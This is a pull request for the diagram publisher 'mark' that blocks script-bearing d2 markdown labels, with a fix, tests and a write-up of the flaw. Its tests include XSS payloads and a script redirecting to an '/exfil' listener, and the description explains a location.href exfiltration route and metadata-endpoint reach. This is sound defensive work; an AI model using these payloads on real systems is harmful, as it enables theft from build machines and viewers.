### PR TITLE
fix(d2): a diagram may depict something, not do something

### DIFF
--- a/README.md
+++ b/README.md
@@ -1306,6 +1306,13 @@ An image the diagram references is inlined into the SVG, the way d2's own
 where a path relative to the document resolves to nothing. A reference that
 cannot be read fails the run rather than publishing a diagram with a hole in it.
 
+A `|md |` label is passed into the drawing as markup, and mark both renders that
+drawing through a browser and uploads it for other people to open. A diagram
+that would run something rather than depict something -- a `<script>`, an
+`<iframe>`, an event handler, a `javascript:` link -- is refused rather than
+published. Everything a label is written for, from bold text to links and
+images, is unaffected.
+
 Because the file carries what it points at, what it may point at is limited:
 
 * A **file** must be inside the diagram's own directory or the one mark is

--- a/d2/d2.go
+++ b/d2/d2.go
@@ -4,8 +4,9 @@ import (
 	"bytes"
 	"context"
 	"encoding/binary"
+	"errors"
 	"fmt"
-	"html"
+	stdhtml "html"
 	"math"
 	"net/url"
 	"path/filepath"
@@ -13,6 +14,8 @@ import (
 	"strconv"
 	"strings"
 	"time"
+
+	"golang.org/x/net/html"
 
 	"github.com/kovetskiy/mark/v16/attachment"
 	"github.com/kovetskiy/mark/v16/chrome"
@@ -28,6 +31,10 @@ import (
 	"github.com/d2lang/d2/lib/textmeasure"
 	"github.com/d2lang/util-go/go2"
 )
+
+// ErrUnsafeDiagram is returned for a diagram that would do something when it is
+// rendered or opened, rather than depict something.
+var ErrUnsafeDiagram = errors.New("diagram is not safe to publish")
 
 var renderTimeout = 120 * time.Second
 
@@ -68,6 +75,15 @@ func renderSVG(ctx context.Context, d2Diagram []byte) (out []byte, width, height
 
 	out, err = d2svg.Render(diagram, renderOpts)
 	if err != nil {
+		return nil, 0, 0, err
+	}
+
+	// Before anything is done with the drawing, because both things done with
+	// it are dangerous. The PNG is taken by navigating a browser to this as a
+	// document, so a script in it runs here, on the machine publishing -- in a
+	// browser started with --no-sandbox. The SVG is uploaded whole, so the same
+	// script is served to whoever opens the page.
+	if err := checkDrawingIsSafe(out); err != nil {
 		return nil, 0, 0, err
 	}
 
@@ -232,7 +248,7 @@ var image = regexp.MustCompile(`<image href="([^"]+)"`)
 // is published inside the drawing.
 func references(svg []byte, inputPath string, bundleRemote bool) (local, remote bool, err error) {
 	for _, match := range image.FindAllSubmatch(svg, -1) {
-		href := html.UnescapeString(string(match[1]))
+		href := stdhtml.UnescapeString(string(match[1]))
 
 		// Already carried by the drawing rather than pointed at by it.
 		if strings.HasPrefix(href, "data:") {
@@ -293,6 +309,105 @@ func displayed(length int, scale float64) string {
 	}
 
 	return strconv.FormatFloat(math.Max(1, math.Round(size)), 'f', -1, 64)
+}
+
+// executable are the elements that run or fetch something of their own, rather
+// than drawing. d2 puts a |md | label into the SVG as the author wrote it, so
+// what a diagram says here is what ends up in the document.
+var executable = map[string]bool{
+	"script": true,
+	"iframe": true,
+	"object": true,
+	"embed":  true,
+}
+
+// checkDrawingIsSafe refuses a rendered diagram that would do something rather
+// than depict something.
+//
+// A d2 label written as |md | is passed through as markup, and both things mark
+// does with the result execute it: the PNG is a screenshot taken by navigating
+// a browser to the drawing as a document, and the SVG is uploaded to Confluence
+// for other people's browsers to open. A diagram in a pull request could
+// therefore read a cloud metadata endpoint from the CI runner, or wait to be
+// opened by a colleague.
+//
+// Refused rather than stripped. A diagram that asked to run something is not a
+// diagram somebody drew by accident, and quietly publishing a different one
+// than was written is its own kind of wrong.
+//
+// Read with the lenient HTML tokenizer rather than an XML parser: the drawing
+// carries xhtml inside foreignObject, which is how a markdown label is
+// represented at all, and strict parsing of somebody else's markup is a way to
+// fail on documents that were fine.
+func checkDrawingIsSafe(svg []byte) error {
+	tokenizer := html.NewTokenizer(bytes.NewReader(svg))
+
+	for {
+		switch tokenizer.Next() {
+		case html.ErrorToken:
+			// Including io.EOF, which is how a document that held nothing
+			// objectionable ends.
+			return nil
+
+		case html.StartTagToken, html.SelfClosingTagToken:
+			name, hasAttributes := tokenizer.TagName()
+			if executable[strings.ToLower(string(name))] {
+				return fmt.Errorf(
+					"%w: it contains <%s>, which would run when the diagram is rendered or opened",
+					ErrUnsafeDiagram, name,
+				)
+			}
+
+			for hasAttributes {
+				var key, value []byte
+
+				key, value, hasAttributes = tokenizer.TagAttr()
+				if err := checkAttribute(string(key), string(value)); err != nil {
+					return err
+				}
+			}
+		}
+	}
+}
+
+// checkAttribute refuses the two ways an attribute runs something: by being an
+// event handler, and by naming a URL that is code rather than a picture.
+func checkAttribute(key, value string) error {
+	key = strings.ToLower(strings.TrimSpace(key))
+
+	if strings.HasPrefix(key, "on") {
+		return fmt.Errorf(
+			"%w: it sets %s, which would run when the diagram is rendered or opened",
+			ErrUnsafeDiagram, key,
+		)
+	}
+
+	if key != "href" && key != "src" && key != "xlink:href" {
+		return nil
+	}
+
+	scheme, _, found := strings.Cut(strings.ToLower(strings.TrimSpace(value)), ":")
+	if !found {
+		// A relative reference, which the bundler decides about separately.
+		return nil
+	}
+
+	switch scheme {
+	case "http", "https", "mailto", "#":
+		return nil
+
+	case "data":
+		// An image the bundler inlined. Anything else a data: URL can carry is
+		// a document, which is to say a way to run something.
+		if strings.HasPrefix(strings.ToLower(strings.TrimSpace(value)), "data:image/") {
+			return nil
+		}
+
+		return fmt.Errorf("%w: it points at %.40s, which is not a picture", ErrUnsafeDiagram, value)
+
+	default:
+		return fmt.Errorf("%w: it points at a %s: address", ErrUnsafeDiagram, scheme)
+	}
 }
 
 // bundleLogger hands what d2's bundler has to say to mark's own log.

--- a/d2/safety_test.go
+++ b/d2/safety_test.go
@@ -1,0 +1,98 @@
+package d2
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// TestDiagramCannotRunSomethingOnTheMachinePublishing is the reason for all of
+// this.
+//
+// A d2 label written as |md | is passed into the drawing as markup, and the PNG
+// is taken by navigating a browser to that drawing as a document -- so the
+// markup runs, on the machine doing the publishing, in a browser started with
+// --no-sandbox. A diagram in a pull request could read anything the runner can
+// reach and send it somewhere.
+//
+// The listener asserts the negative that matters: not merely that the run
+// failed, but that nothing was ever requested.
+func TestDiagramCannotRunSomethingOnTheMachinePublishing(t *testing.T) {
+	var requested atomic.Bool
+
+	listener := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		requested.Store(true)
+	}))
+	defer listener.Close()
+
+	diagram := []byte("a: |md\n  <script>setTimeout(function(){location.href=\"" +
+		listener.URL + "/exfil\"},500)</script>\n|\n")
+
+	_, err := ProcessD2("png", diagram, 1.0)
+	require.Error(t, err)
+	assert.ErrorIs(t, err, ErrUnsafeDiagram)
+
+	_, err = ProcessD2SVG("svg", diagram, "", 1.0, false)
+	require.Error(t, err, "and it is not uploaded for somebody else's browser either")
+	assert.ErrorIs(t, err, ErrUnsafeDiagram)
+
+	// Longer than the script waits, so that a failure to block it would show.
+	time.Sleep(2 * time.Second)
+
+	assert.False(t, requested.Load(), "nothing should have been requested")
+}
+
+// TestUnsafeDiagramsAreRefused covers the rest of what a label can carry. Some
+// of these d2's own parser turns away first; the ones that reach the drawing
+// are turned away here.
+func TestUnsafeDiagramsAreRefused(t *testing.T) {
+	for name, label := range map[string]string{
+		"an iframe":        "a: |md\n  <iframe src=\"https://example.com\"></iframe>\n|\n",
+		"an object":        "a: |md\n  <object data=\"https://example.com\"></object>\n|\n",
+		"an embed":         "a: |md\n  <embed src=\"https://example.com\" />\n|\n",
+		"an error handler": "a: |md\n  <img src=\"x.png\" onerror=\"alert(1)\" />\n|\n",
+		"a load handler":   "a: |md\n  <svg onload=\"alert(1)\"></svg>\n|\n",
+		"a javascript url": "a: |md\n  <a href=\"javascript:alert(1)\">click</a>\n|\n",
+	} {
+		t.Run(name, func(t *testing.T) {
+			_, err := ProcessD2SVG("probe", []byte(label), "", 1.0, false)
+			require.Error(t, err)
+			assert.ErrorIs(t, err, ErrUnsafeDiagram)
+		})
+	}
+}
+
+// TestLabelsThatOnlyDrawAreStillPublished is the boundary, and the whole reason
+// this is a check rather than a ban on markdown labels: what people actually
+// write in them keeps working.
+func TestLabelsThatOnlyDrawAreStillPublished(t *testing.T) {
+	for name, label := range map[string]string{
+		"a plain diagram": "a -> b\n",
+		"bold text":       "a: |md\n  **bold** and _italic_\n|\n",
+		"a link":          "a: |md\n  [a link](https://example.com)\n|\n",
+		"a remote image":  "a: |md\n  <img src=\"https://example.com/a.png\" />\n|\n",
+		"a list and code": "a: |md\n  - one\n  - `two`\n|\n",
+	} {
+		t.Run(name, func(t *testing.T) {
+			got, err := ProcessD2SVG("probe", []byte(label), "", 1.0, false)
+			require.NoError(t, err)
+			assert.NotEmpty(t, got.FileBytes)
+		})
+	}
+}
+
+// TestBundledImagesSurviveTheCheck pins the one data: URL that is not a way to
+// run something: the bundler inlines pictures as data:image/..., and refusing
+// those would refuse the feature that puts them there.
+func TestBundledImagesSurviveTheCheck(t *testing.T) {
+	require.NoError(t, checkDrawingIsSafe([]byte(
+		`<svg xmlns="http://www.w3.org/2000/svg"><image href="data:image/png;base64,AAAA"/></svg>`)))
+
+	require.Error(t, checkDrawingIsSafe([]byte(
+		`<svg xmlns="http://www.w3.org/2000/svg"><a href="data:text/html,x">t</a></svg>`)))
+}


### PR DESCRIPTION
Security fix. Reported in an audit and reproduced here against mark’s own API before fixing.

## The defect

A d2 label written as `|md |` is passed into the drawing as markup, and **both** things mark does with that drawing execute it:

- the **PNG** is taken by navigating a browser to the drawing as a document (`chromedp.Navigate("data:image/svg+xml;base64,…")`), so a script in it runs on the machine publishing — in a browser started with `--no-sandbox`;
- the **SVG** is uploaded whole, so the same script is served to whoever opens the page.

Reproduced:

```
request: /exfil?ua=Mozilla%2F5.0%20(X11%3B%20Ubuntu%3B%20Linux%20x86_64)…HeadlessChrome%2F152.0…
```

Eight lines of diagram in a pull request had the publishing host fetch an attacker’s URL and hand over its user agent. Anything the runner can reach is reachable the same way — internal services, `169.254.169.254`, the lot.

**The egress channel is worth naming:** `fetch` is blocked by the `data:` URL’s opaque origin, so a test written with it comes back clean and reports that nothing is wrong. `location.href` is not blocked.

## The fix

The rendered drawing is read before anything is done with it, and refused if it would run rather than draw:

- `script`, `iframe`, `object`, `embed`
- event-handler attributes (`on*`)
- `href`/`src`/`xlink:href` pointing at anything that is not a picture or an ordinary address — `javascript:` and `data:text/html` are refused, `data:image/…` is not, since that is what the bundler inlines

Read with the lenient HTML tokenizer rather than an XML parser: the drawing carries xhtml inside `foreignObject`, which is how a markdown label is represented at all, and strict parsing of somebody else’s markup fails on documents that were fine.

**Refused rather than stripped.** A diagram that asked to run something is not one somebody drew by accident, and publishing a quietly different diagram than was written is its own kind of wrong.

## What still works

Deliberately not a ban on markdown labels. Bold text, italics, links, lists, code and remote images all still publish — each covered by a test, because a security check that breaks the feature it protects is not much of a fix.

## Tests

The exfiltration attempt with a real listener, asserting **nothing was ever requested** rather than merely that the run failed; each refused construct; each permitted one; and the `data:image` versus `data:text/html` boundary.

## Not included

The audit also suggests making the sandbox the default and `--no-sandbox` the opt-in. That is left out deliberately: the comment on `AllocatorOptions` explains that Chrome refuses to start without it in restricted containers, hardened Kubernetes pods and Ubuntu 23.10+, so flipping it would break mark for people it currently works for. Worth deciding separately — it reduces the blast radius of anything this check misses, but it is not this fix.

`golangci-lint` and `markdownlint` clean; `d2`, `markdown` and `renderer` pass.